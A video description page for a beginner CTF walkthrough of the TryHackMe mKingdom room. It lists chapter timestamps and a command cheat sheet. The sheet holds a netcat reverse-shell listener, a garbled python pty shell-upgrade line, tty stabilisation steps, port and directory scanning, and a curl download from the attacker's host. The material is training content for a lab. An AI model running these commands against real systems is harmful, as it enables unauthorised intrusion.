Войти
  • 5645Просмотров
  • 1 год назадОпубликованоpebble

Intro To Hacking and CTFs | TryHackMe mKingdom | Easy

In this video, I give an intro to approaching CTFs using Kingdom CTF on TryHackMe. If you want to learn more about hacking, check out my Twitch where I am every Sunday @ 12 PM EST Join HackTheBox: Join the discord: 0:00 Intro 0:34 VPN 1:23 Enumeration 5:35 Initial Foothold 9:52 Lateral Movement 13:26 Privilege Escalation TryHackMe mKingdom: sudo openvpn (.ovpn path) nmap (ip) -p- -sVC -T4 -oN (filename) gobuster dir -w /usr/share/wordlists/dirbuster/ -u http://(ip):(port)/ -x txt -o (filename) nc -lvnp 443 python3 -c 'import pty; ("/bin/bash")' CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; python3 -m 80 curl http://(ip):(port)/(file) -o (filename) cybersecurity enginer,pentest,ethical hacker,#hacker,Cybersecurity,Ethical Hacking,beginner hacker,bypass login,code injection,ctf,cybersecurity,exploit,hacker,hacking,how to hack,injection,pebble,pebl3,tryhackme,windows hacking,hackers,linux hacking,hackthebox,mKingdom,mKingdom ctf,mkingdom tryhackme,intro to ctf,intro to hacking,information technology,how to ctf Music by White Bat Audio